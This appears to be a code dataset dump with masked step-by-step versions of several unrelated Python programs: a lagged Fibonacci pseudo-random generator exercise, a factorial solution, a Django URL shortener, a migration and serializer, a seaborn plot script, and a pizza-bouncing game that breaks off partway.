a = b + 1
break
else:
a = b + 1
break
b += 1
return a, c, randint(2, period)
def gen_linear_congruential(period):
coeff_a, coeff_c, x0 = get_coeff(period)
result = [x0]
for i in range(1, period):
result.append((coeff_a * result[i - 1] + coeff_c) % period)
return result
def LFG(init, lst, m, count):
result = init.copy()
for i in range(len(init), count):
result.append(sum([result[len(result) - j] for j in lst]) % (2 ** m))
return result
delays = input("Параметры запаздывания: ")
if not delays:
# y = x^k + x^j + 1 must be primitive
delays = choice([[7, 10], [5, 17], [24, 55], [65, 71], [128, 159]])
k = delays[1] + 10
m = 8
print(f"delays = {delays}, k = {k}, m = {m}")
else:
delays = [int(item) for item in delays.split()]
k = int(input("Длина начального заполнения: "))
m = int(input("Модуль: "))
initial_filling = gen_linear_congruential(k)
print(LFG(initial_filling, delays, m, 1000))
|
normal
|
{
"blob_id": "11e9d25c30c8c9945cfa3c234ffa1aab98d1869e",
"index": 8023,
"step-1": "<mask token>\n\n\ndef factor(n):\n result = []\n d = 2\n while d * d <= n:\n if n % d == 0:\n result.append(d)\n n //= d\n else:\n d += 1\n if n > 1:\n result.append(n)\n return result\n\n\ndef get_coeff(period):\n c = randint(0, period)\n while gcd(c, period) != 1:\n c += 1\n b = 2\n a = None\n factor_result = factor(period)\n while b <= period:\n if all([(b % p == 0) for p in factor_result]):\n if period % 4 == 0:\n if b % 4 == 0:\n a = b + 1\n break\n else:\n a = b + 1\n break\n b += 1\n return a, c, randint(2, period)\n\n\ndef gen_linear_congruential(period):\n coeff_a, coeff_c, x0 = get_coeff(period)\n result = [x0]\n for i in range(1, period):\n result.append((coeff_a * result[i - 1] + coeff_c) % period)\n return result\n\n\ndef LFG(init, lst, m, count):\n result = init.copy()\n for i in range(len(init), count):\n result.append(sum([result[len(result) - j] for j in lst]) % 2 ** m)\n return result\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef factor(n):\n result = []\n d = 2\n while d * d <= n:\n if n % d == 0:\n result.append(d)\n n //= d\n else:\n d += 1\n if n > 1:\n result.append(n)\n return result\n\n\ndef get_coeff(period):\n c = randint(0, period)\n while gcd(c, period) != 1:\n c += 1\n b = 2\n a = None\n factor_result = factor(period)\n while b <= period:\n if all([(b % p == 0) for p in factor_result]):\n if period % 4 == 0:\n if b % 4 == 0:\n a = b + 1\n break\n else:\n a = b + 1\n break\n b += 1\n return a, c, randint(2, period)\n\n\ndef gen_linear_congruential(period):\n coeff_a, coeff_c, x0 = get_coeff(period)\n result = [x0]\n for i in range(1, period):\n result.append((coeff_a * result[i - 1] + coeff_c) % period)\n return result\n\n\ndef LFG(init, lst, m, count):\n result = init.copy()\n for i in range(len(init), count):\n result.append(sum([result[len(result) - j] for j in lst]) % 2 ** m)\n return result\n\n\n<mask token>\nif not delays:\n delays = choice([[7, 10], [5, 17], [24, 55], [65, 71], [128, 159]])\n k = delays[1] + 10\n m = 8\n print(f'delays = {delays}, k = {k}, m = {m}')\nelse:\n delays = [int(item) for item in delays.split()]\n k = int(input('Длина начального заполнения: '))\n m = int(input('Модуль: '))\n<mask token>\nprint(LFG(initial_filling, delays, m, 1000))\n",
"step-3": "<mask token>\ntask = \"\"\"6. Реализовать алгоритм построения ПСП методом Фиббоначи с\nзапаздываниями. Обосновать выбор коэффициентов алгоритма. Для\nначального заполнения использовать стандартную линейную конгруэнтную\nПСП с выбранным периодом. Реализовать возможность для пользователя\nвводить коэффициенты заранее.\"\"\"\n\n\ndef factor(n):\n result = []\n d = 2\n while d * d <= n:\n if n % d == 0:\n result.append(d)\n n //= d\n else:\n d += 1\n if n > 1:\n result.append(n)\n return result\n\n\ndef get_coeff(period):\n c = randint(0, period)\n while gcd(c, period) != 1:\n c += 1\n b = 2\n a = None\n factor_result = factor(period)\n while b <= period:\n if all([(b % p == 0) for p in factor_result]):\n if period % 4 == 0:\n if b % 4 == 0:\n a = b + 1\n break\n else:\n a = b + 1\n break\n b += 1\n return a, c, randint(2, period)\n\n\ndef gen_linear_congruential(period):\n coeff_a, coeff_c, x0 = get_coeff(period)\n result = [x0]\n for i in range(1, period):\n result.append((coeff_a * result[i - 1] + coeff_c) % period)\n return result\n\n\ndef LFG(init, lst, m, count):\n result = init.copy()\n for i in range(len(init), count):\n result.append(sum([result[len(result) - j] for j in lst]) % 2 ** m)\n return result\n\n\ndelays = input('Параметры запаздывания: ')\nif not delays:\n delays = choice([[7, 10], [5, 17], [24, 55], [65, 71], [128, 159]])\n k = delays[1] + 10\n m = 8\n print(f'delays = {delays}, k = {k}, m = {m}')\nelse:\n delays = [int(item) for item in delays.split()]\n k = int(input('Длина начального заполнения: '))\n m = int(input('Модуль: '))\ninitial_filling = gen_linear_congruential(k)\nprint(LFG(initial_filling, delays, m, 1000))\n",
"step-4": "from math import gcd\nfrom random import randint, choice\ntask = \"\"\"6. Реализовать алгоритм построения ПСП методом Фиббоначи с\nзапаздываниями. Обосновать выбор коэффициентов алгоритма. Для\nначального заполнения использовать стандартную линейную конгруэнтную\nПСП с выбранным периодом. Реализовать возможность для пользователя\nвводить коэффициенты заранее.\"\"\"\n\n\ndef factor(n):\n result = []\n d = 2\n while d * d <= n:\n if n % d == 0:\n result.append(d)\n n //= d\n else:\n d += 1\n if n > 1:\n result.append(n)\n return result\n\n\ndef get_coeff(period):\n c = randint(0, period)\n while gcd(c, period) != 1:\n c += 1\n b = 2\n a = None\n factor_result = factor(period)\n while b <= period:\n if all([(b % p == 0) for p in factor_result]):\n if period % 4 == 0:\n if b % 4 == 0:\n a = b + 1\n break\n else:\n a = b + 1\n break\n b += 1\n return a, c, randint(2, period)\n\n\ndef gen_linear_congruential(period):\n coeff_a, coeff_c, x0 = get_coeff(period)\n result = [x0]\n for i in range(1, period):\n result.append((coeff_a * result[i - 1] + coeff_c) % period)\n return result\n\n\ndef LFG(init, lst, m, count):\n result = init.copy()\n for i in range(len(init), count):\n result.append(sum([result[len(result) - j] for j in lst]) % 2 ** m)\n return result\n\n\ndelays = input('Параметры запаздывания: ')\nif not delays:\n delays = choice([[7, 10], [5, 17], [24, 55], [65, 71], [128, 159]])\n k = delays[1] + 10\n m = 8\n print(f'delays = {delays}, k = {k}, m = {m}')\nelse:\n delays = [int(item) for item in delays.split()]\n k = int(input('Длина начального заполнения: '))\n m = int(input('Модуль: '))\ninitial_filling = gen_linear_congruential(k)\nprint(LFG(initial_filling, delays, m, 1000))\n",
"step-5": "from math import gcd\nfrom random import randint, choice\n\ntask = \"\"\"6. Реализовать алгоритм построения ПСП методом Фиббоначи с\nзапаздываниями. Обосновать выбор коэффициентов алгоритма. Для\nначального заполнения использовать стандартную линейную конгруэнтную\nПСП с выбранным периодом. Реализовать возможность для пользователя\nвводить коэффициенты заранее.\"\"\"\n\n\ndef factor(n):\n result = []\n d = 2\n while d * d <= n:\n if n % d == 0:\n result.append(d)\n n //= d\n else:\n d += 1\n if n > 1:\n result.append(n)\n return result\n\n\ndef get_coeff(period):\n c = randint(0, period)\n while gcd(c, period) != 1:\n c += 1\n b = 2\n a = None\n factor_result = factor(period)\n while b <= period:\n if all([b % p == 0 for p in factor_result]):\n if period % 4 == 0:\n if b % 4 == 0:\n a = b + 1\n break\n else:\n a = b + 1\n break\n b += 1\n return a, c, randint(2, period)\n\n\ndef gen_linear_congruential(period):\n coeff_a, coeff_c, x0 = get_coeff(period)\n result = [x0]\n for i in range(1, period):\n result.append((coeff_a * result[i - 1] + coeff_c) % period)\n return result\n\n\ndef LFG(init, lst, m, count):\n result = init.copy()\n for i in range(len(init), count):\n result.append(sum([result[len(result) - j] for j in lst]) % (2 ** m))\n return result\n\n\ndelays = input(\"Параметры запаздывания: \")\nif not delays:\n # y = x^k + x^j + 1 must be primitive\n delays = choice([[7, 10], [5, 17], [24, 55], [65, 71], [128, 159]])\n k = delays[1] + 10\n m = 8\n print(f\"delays = {delays}, k = {k}, m = {m}\")\nelse:\n delays = [int(item) for item in delays.split()]\n k = int(input(\"Длина начального заполнения: \"))\n m = int(input(\"Модуль: \"))\ninitial_filling = gen_linear_congruential(k)\nprint(LFG(initial_filling, delays, m, 1000))\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def extraLongFactorials(n):
print(math.factorial(n))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def extraLongFactorials(n):
print(math.factorial(n))
if __name__ == '__main__':
n = int(input())
extraLongFactorials(n)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import math
import os
import random
import re
import sys
def extraLongFactorials(n):
print(math.factorial(n))
if __name__ == '__main__':
n = int(input())
extraLongFactorials(n)
<|reserved_special_token_1|>
'''
Function Description
Complete the extraLongFactorials function in the editor below. It should print the result and return.
extraLongFactorials has the following parameter(s):
n: an integer
Note: Factorials of
can't be stored even in a
long long variable. Big integers must be used for such calculations. Languages like Java, Python, Ruby etc. can handle big integers, but we need to write additional code in C/C++ to handle huge values.
We recommend solving this challenge using BigIntegers.
Input Format
Input consists of a single integer
Output Format
Print the factorial of.
'''
#!/bin/python3
import math
import os
import random
import re
import sys
def extraLongFactorials(n):
print(math.factorial(n))
if __name__ == '__main__':
n = int(input())
extraLongFactorials(n)
|
flexible
|
{
"blob_id": "5c1ce46f45da33acf75a7f47add811b14d58414d",
"index": 1169,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef extraLongFactorials(n):\n print(math.factorial(n))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef extraLongFactorials(n):\n print(math.factorial(n))\n\n\nif __name__ == '__main__':\n n = int(input())\n extraLongFactorials(n)\n",
"step-4": "<mask token>\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\ndef extraLongFactorials(n):\n print(math.factorial(n))\n\n\nif __name__ == '__main__':\n n = int(input())\n extraLongFactorials(n)\n",
"step-5": "'''\r\nFunction Description\r\n\r\nComplete the extraLongFactorials function in the editor below. It should print the result and return.\r\n\r\nextraLongFactorials has the following parameter(s):\r\n\r\n n: an integer\r\n\r\nNote: Factorials of\r\ncan't be stored even in a\r\n\r\nlong long variable. Big integers must be used for such calculations. Languages like Java, Python, Ruby etc. can handle big integers, but we need to write additional code in C/C++ to handle huge values.\r\n\r\nWe recommend solving this challenge using BigIntegers.\r\n\r\nInput Format\r\n\r\nInput consists of a single integer \r\nOutput Format\r\n\r\nPrint the factorial of. \r\n'''\n \r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\ndef extraLongFactorials(n):\r\n print(math.factorial(n))\r\n\r\nif __name__ == '__main__':\r\n n = int(input())\r\n\r\n extraLongFactorials(n)\r\n \n \n ",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.shortcuts import render
from django.contrib import messages
from django.views.generic import View
from django.views.decorators.http import require_GET, require_POST
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse,HttpResponsePermanentRedirect,HttpResponseRedirect
from django.db.models import Count
from .forms import UrlForm
from .models import Link
import random
import string
def short_url_gen(stringLength=5):
"""Generate a random string of fixed length """
letters = string.ascii_letters + string.digits
return ''.join(random.choice(letters) for i in range(stringLength))
@require_GET
def Follow(request,shorturl):
link = get_object_or_404(Link,shorturl=shorturl)
link.vi += 1
print(link.vi)
link.save()
return HttpResponseRedirect(link.link)
def FormView(request):
toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]
if request.user.is_authenticated:
yl = Link.objects.filter(user = request.user)
else:
yl = None
context = {
'form' :UrlForm,
'links':yl,
't':toplink
}
return render(request, 'shortu.html', context)
@require_GET
def info(request,shorturl):
link = get_object_or_404(Link,shorturl=shorturl)
return render(request,'info.html',{'link':link})
@require_POST
def Submit(request):
form = UrlForm(request.POST)
if form.is_valid():
link = form.cleaned_data['url']
costom = form.cleaned_data['costom']
if costom:
if Link.objects.filter(shorturl=costom).exists():
#messages(request,"Costom url aready taken")
pass
else:
shorturl = costom
newlink = Link.objects.create(link= link,user = request.user, shorturl= shorturl)
return render(request,'info.html',{'link':newlink})
j=1
while j<11:
newshort = short_url_gen(j)
if Link.objects.filter(shorturl=costom).exists():
j+=1
continue
newlink = Link.objects.create(link= link, shorturl= newshort,user = request.user)
return render(request,'info.html',{'link':newlink})
return render(request, 'home.html')
|
normal
|
{
"blob_id": "11952e60ab95bc1896fd899a5ced126dcafec63a",
"index": 9882,
"step-1": "<mask token>\n\n\n@require_GET\ndef Follow(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user=request.user)\n else:\n yl = None\n context = {'form': UrlForm, 'links': yl, 't': toplink}\n return render(request, 'shortu.html', context)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@require_GET\ndef Follow(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user=request.user)\n else:\n yl = None\n context = {'form': UrlForm, 'links': yl, 't': toplink}\n return render(request, 'shortu.html', context)\n\n\n@require_GET\ndef info(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n return render(request, 'info.html', {'link': link})\n\n\n@require_POST\ndef Submit(request):\n form = UrlForm(request.POST)\n if form.is_valid():\n link = form.cleaned_data['url']\n costom = form.cleaned_data['costom']\n if costom:\n if Link.objects.filter(shorturl=costom).exists():\n pass\n else:\n shorturl = costom\n newlink = Link.objects.create(link=link, user=request.user,\n shorturl=shorturl)\n return render(request, 'info.html', {'link': newlink})\n j = 1\n while j < 11:\n newshort = short_url_gen(j)\n if Link.objects.filter(shorturl=costom).exists():\n j += 1\n continue\n newlink = Link.objects.create(link=link, shorturl=newshort,\n user=request.user)\n return render(request, 'info.html', {'link': newlink})\n return render(request, 'home.html')\n",
"step-3": "<mask token>\n\n\ndef short_url_gen(stringLength=5):\n \"\"\"Generate a random string of fixed length \"\"\"\n letters = string.ascii_letters + string.digits\n return ''.join(random.choice(letters) for i in range(stringLength))\n\n\n@require_GET\ndef Follow(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user=request.user)\n else:\n yl = None\n context = {'form': UrlForm, 'links': yl, 't': toplink}\n return render(request, 'shortu.html', context)\n\n\n@require_GET\ndef info(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n return render(request, 'info.html', {'link': link})\n\n\n@require_POST\ndef Submit(request):\n form = UrlForm(request.POST)\n if form.is_valid():\n link = form.cleaned_data['url']\n costom = form.cleaned_data['costom']\n if costom:\n if Link.objects.filter(shorturl=costom).exists():\n pass\n else:\n shorturl = costom\n newlink = Link.objects.create(link=link, user=request.user,\n shorturl=shorturl)\n return render(request, 'info.html', {'link': newlink})\n j = 1\n while j < 11:\n newshort = short_url_gen(j)\n if Link.objects.filter(shorturl=costom).exists():\n j += 1\n continue\n newlink = Link.objects.create(link=link, shorturl=newshort,\n user=request.user)\n return render(request, 'info.html', {'link': newlink})\n return render(request, 'home.html')\n",
"step-4": "from django.shortcuts import render\nfrom django.contrib import messages\nfrom django.views.generic import View\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponsePermanentRedirect, HttpResponseRedirect\nfrom django.db.models import Count\nfrom .forms import UrlForm\nfrom .models import Link\nimport random\nimport string\n\n\ndef short_url_gen(stringLength=5):\n \"\"\"Generate a random string of fixed length \"\"\"\n letters = string.ascii_letters + string.digits\n return ''.join(random.choice(letters) for i in range(stringLength))\n\n\n@require_GET\ndef Follow(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user=request.user)\n else:\n yl = None\n context = {'form': UrlForm, 'links': yl, 't': toplink}\n return render(request, 'shortu.html', context)\n\n\n@require_GET\ndef info(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n return render(request, 'info.html', {'link': link})\n\n\n@require_POST\ndef Submit(request):\n form = UrlForm(request.POST)\n if form.is_valid():\n link = form.cleaned_data['url']\n costom = form.cleaned_data['costom']\n if costom:\n if Link.objects.filter(shorturl=costom).exists():\n pass\n else:\n shorturl = costom\n newlink = Link.objects.create(link=link, user=request.user,\n shorturl=shorturl)\n return render(request, 'info.html', {'link': newlink})\n j = 1\n while j < 11:\n newshort = short_url_gen(j)\n if Link.objects.filter(shorturl=costom).exists():\n j += 1\n continue\n newlink = Link.objects.create(link=link, shorturl=newshort,\n user=request.user)\n return render(request, 'info.html', {'link': newlink})\n return render(request, 'home.html')\n",
"step-5": "from django.shortcuts import render\nfrom django.contrib import messages\nfrom django.views.generic import View\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse,HttpResponsePermanentRedirect,HttpResponseRedirect\nfrom django.db.models import Count\n\nfrom .forms import UrlForm\nfrom .models import Link\n\nimport random\nimport string\n\ndef short_url_gen(stringLength=5):\n \"\"\"Generate a random string of fixed length \"\"\"\n letters = string.ascii_letters + string.digits\n return ''.join(random.choice(letters) for i in range(stringLength))\n@require_GET\ndef Follow(request,shorturl):\n link = get_object_or_404(Link,shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user = request.user)\n else:\n yl = None\n context = {\n 'form' :UrlForm,\n 'links':yl,\n 't':toplink\n }\n\n return render(request, 'shortu.html', context)\n@require_GET\ndef info(request,shorturl):\n link = get_object_or_404(Link,shorturl=shorturl)\n return render(request,'info.html',{'link':link})\n\n@require_POST\ndef Submit(request):\n form = UrlForm(request.POST)\n if form.is_valid():\n link = form.cleaned_data['url']\n costom = form.cleaned_data['costom']\n if costom:\n if Link.objects.filter(shorturl=costom).exists():\n #messages(request,\"Costom url aready taken\")\n pass\n else: \n shorturl = costom\n newlink = Link.objects.create(link= link,user = request.user, shorturl= shorturl)\n return render(request,'info.html',{'link':newlink})\n j=1\n while j<11:\n newshort = short_url_gen(j)\n if Link.objects.filter(shorturl=costom).exists():\n j+=1\n continue\n newlink = Link.objects.create(link= link, shorturl= newshort,user = request.user)\n return render(request,'info.html',{'link':newlink})\n \n\n return render(request, 'home.html')",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('usuarios', '0001_initial')]
operations = [migrations.AlterField(model_name='usuario', name='inicio',
field=models.DateField(verbose_name='Data Inicio')), migrations.
AlterField(model_name='usuario', name='saida', field=models.
DateField(null=True, verbose_name='Data de Saida'))]
<|reserved_special_token_1|>
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('usuarios', '0001_initial')]
operations = [migrations.AlterField(model_name='usuario', name='inicio',
field=models.DateField(verbose_name='Data Inicio')), migrations.
AlterField(model_name='usuario', name='saida', field=models.
DateField(null=True, verbose_name='Data de Saida'))]
<|reserved_special_token_1|>
# Generated by Django 2.2.2 on 2019-07-30 01:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('usuarios', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='usuario',
name='inicio',
field=models.DateField(verbose_name='Data Inicio'),
),
migrations.AlterField(
model_name='usuario',
name='saida',
field=models.DateField(null=True, verbose_name='Data de Saida'),
),
]
|
flexible
|
{
"blob_id": "5e4a334b373d912ba37b18f95e4866450bda5570",
"index": 3938,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('usuarios', '0001_initial')]\n operations = [migrations.AlterField(model_name='usuario', name='inicio',\n field=models.DateField(verbose_name='Data Inicio')), migrations.\n AlterField(model_name='usuario', name='saida', field=models.\n DateField(null=True, verbose_name='Data de Saida'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('usuarios', '0001_initial')]\n operations = [migrations.AlterField(model_name='usuario', name='inicio',\n field=models.DateField(verbose_name='Data Inicio')), migrations.\n AlterField(model_name='usuario', name='saida', field=models.\n DateField(null=True, verbose_name='Data de Saida'))]\n",
"step-5": "# Generated by Django 2.2.2 on 2019-07-30 01:25\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('usuarios', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='usuario',\n name='inicio',\n field=models.DateField(verbose_name='Data Inicio'),\n ),\n migrations.AlterField(\n model_name='usuario',\n name='saida',\n field=models.DateField(null=True, verbose_name='Data de Saida'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TasksSerializer(serializers.ModelSerializer):
<|reserved_special_token_0|>
class Meta:
model = Tasks
fields = ['id', 'created', 'title', 'description', 'status', 'user']
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TasksSerializer(serializers.ModelSerializer):
user = serializers.ReadOnlyField(source='user.username')
class Meta:
model = Tasks
fields = ['id', 'created', 'title', 'description', 'status', 'user']
<|reserved_special_token_1|>
from rest_framework import serializers
from dailytasks.models import Tasks
class TasksSerializer(serializers.ModelSerializer):
user = serializers.ReadOnlyField(source='user.username')
class Meta:
model = Tasks
fields = ['id', 'created', 'title', 'description', 'status', 'user']
|
flexible
|
{
"blob_id": "3fa1736fd87448ec0da4649153521d0aba048ccf",
"index": 3689,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass TasksSerializer(serializers.ModelSerializer):\n <mask token>\n\n\n class Meta:\n model = Tasks\n fields = ['id', 'created', 'title', 'description', 'status', 'user']\n",
"step-3": "<mask token>\n\n\nclass TasksSerializer(serializers.ModelSerializer):\n user = serializers.ReadOnlyField(source='user.username')\n\n\n class Meta:\n model = Tasks\n fields = ['id', 'created', 'title', 'description', 'status', 'user']\n",
"step-4": "from rest_framework import serializers\nfrom dailytasks.models import Tasks\n\n\nclass TasksSerializer(serializers.ModelSerializer):\n user = serializers.ReadOnlyField(source='user.username')\n\n\n class Meta:\n model = Tasks\n fields = ['id', 'created', 'title', 'description', 'status', 'user']\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# First, we'll import pandas, a data processing and CSV file I/O library
import pandas as pd
# We'll also import seaborn, a Python graphing library
import warnings # current version of seaborn generates a bunch of warnings that we'll ignore
warnings.filterwarnings("ignore")
import seaborn as sns
import matplotlib.pyplot as plt
sns.set(style="white", color_codes=True)
# Next, we'll load the Iris flower dataset, which is in the "../input/" directory
iris = pd.read_csv("finalOutputV1.csv") # the iris dataset is now a Pandas DataFrame
# We can look at an individual feature in Seaborn through a boxplot
sns.boxplot(x="Species", y="PetalLengthCm", data=iris)
plt.show()
|
normal
|
{
"blob_id": "0125abab0312d8f007e76ee710348efc9daae31e",
"index": 4989,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwarnings.filterwarnings('ignore')\n<mask token>\nsns.set(style='white', color_codes=True)\n<mask token>\nsns.boxplot(x='Species', y='PetalLengthCm', data=iris)\nplt.show()\n",
"step-3": "<mask token>\nwarnings.filterwarnings('ignore')\n<mask token>\nsns.set(style='white', color_codes=True)\niris = pd.read_csv('finalOutputV1.csv')\nsns.boxplot(x='Species', y='PetalLengthCm', data=iris)\nplt.show()\n",
"step-4": "import pandas as pd\nimport warnings\nwarnings.filterwarnings('ignore')\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nsns.set(style='white', color_codes=True)\niris = pd.read_csv('finalOutputV1.csv')\nsns.boxplot(x='Species', y='PetalLengthCm', data=iris)\nplt.show()\n",
"step-5": "# First, we'll import pandas, a data processing and CSV file I/O library\nimport pandas as pd\n\n# We'll also import seaborn, a Python graphing library\nimport warnings # current version of seaborn generates a bunch of warnings that we'll ignore\n\nwarnings.filterwarnings(\"ignore\")\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nsns.set(style=\"white\", color_codes=True)\n\n# Next, we'll load the Iris flower dataset, which is in the \"../input/\" directory\niris = pd.read_csv(\"finalOutputV1.csv\") # the iris dataset is now a Pandas DataFrame\n# We can look at an individual feature in Seaborn through a boxplot\nsns.boxplot(x=\"Species\", y=\"PetalLengthCm\", data=iris)\nplt.show()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Pan(games.Sprite):
<|reserved_special_token_0|>
def update(self):
""" Move to mouse coordinates """
self.x = games.mouse.x
self.check_collide()
<|reserved_special_token_0|>
class Pizza(games.Sprite):
def update(self):
global SCORE
if self.right > games.screen.width or self.left < 0:
self.dx = -self.dx
if self.top < 0:
self.dy = -self.dy
def handle_collide(self):
self.dy = -self.dy
class ScText(games.Text):
def update(self):
self.value = SCORE
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Pan(games.Sprite):
""" A pan controlled by the mouse. """
def update(self):
""" Move to mouse coordinates """
self.x = games.mouse.x
self.check_collide()
def check_collide(self):
""" Check for collision with pizza. """
for pizza in self.overlapping_sprites:
pizza.handle_collide()
class Pizza(games.Sprite):
def update(self):
global SCORE
if self.right > games.screen.width or self.left < 0:
self.dx = -self.dx
if self.top < 0:
self.dy = -self.dy
def handle_collide(self):
self.dy = -self.dy
class ScText(games.Text):
def update(self):
self.value = SCORE
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Pan(games.Sprite):
""" A pan controlled by the mouse. """
def update(self):
""" Move to mouse coordinates """
self.x = games.mouse.x
self.check_collide()
def check_collide(self):
""" Check for collision with pizza. """
for pizza in self.overlapping_sprites:
pizza.handle_collide()
class Pizza(games.Sprite):
def update(self):
global SCORE
if self.right > games.screen.width or self.left < 0:
self.dx = -self.dx
if self.top < 0:
self.dy = -self.dy
def handle_collide(self):
self.dy = -self.dy
class ScText(games.Text):
def update(self):
self.value = SCORE
def main():
bg_img = games.load_image('images/pizzeria.jpg', transparent=True)
pizza_img = games.load_image('images/pizza.png')
pan_img = games.load_image('images/mousepoint.png')
games.screen.background = bg_img
pizza = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.screen
.height / 2, dx=random.randint(-10, 10), dy=random.randint(-10, 10))
pizza2 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.
screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-
10, 10))
pizza3 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.
screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-
10, 10))
pizza4 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.
screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-
10, 10))
pan = Pan(image=pan_img, x=games.mouse.x, y=games.mouse.y)
score = ScText(value=SCORE, size=60, is_collideable=False, color=color.
black, x=550, y=30)
games.screen.add(pizza)
games.screen.add(pizza2)
games.screen.add(pizza3)
games.screen.add(pizza4)
games.screen.add(score)
games.screen.add(pan)
games.mouse.is_visible = False
games.screen.event_grab = False
games.screen.mainloop()
games.screen.add(score)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from superwires import games, color
import random
SCORE = 0
games.init(screen_width=640, screen_height=480, fps=50)
class Pan(games.Sprite):
""" A pan controlled by the mouse. """
def update(self):
""" Move to mouse coordinates """
self.x = games.mouse.x
self.check_collide()
def check_collide(self):
""" Check for collision with pizza. """
for pizza in self.overlapping_sprites:
pizza.handle_collide()
class Pizza(games.Sprite):
def update(self):
global SCORE
if self.right > games.screen.width or self.left < 0:
self.dx = -self.dx
if self.top < 0:
self.dy = -self.dy
def handle_collide(self):
self.dy = -self.dy
class ScText(games.Text):
def update(self):
self.value = SCORE
def main():
bg_img = games.load_image('images/pizzeria.jpg', transparent=True)
pizza_img = games.load_image('images/pizza.png')
pan_img = games.load_image('images/mousepoint.png')
games.screen.background = bg_img
pizza = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.screen
.height / 2, dx=random.randint(-10, 10), dy=random.randint(-10, 10))
pizza2 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.
screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-
10, 10))
pizza3 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.
screen.height / 2, dx=random.randint(-10, 10), dy=random.randint(-
10, 10))
pizza4 = Pizza(image=pizza_img, x=games.screen.width / 2, y=games.
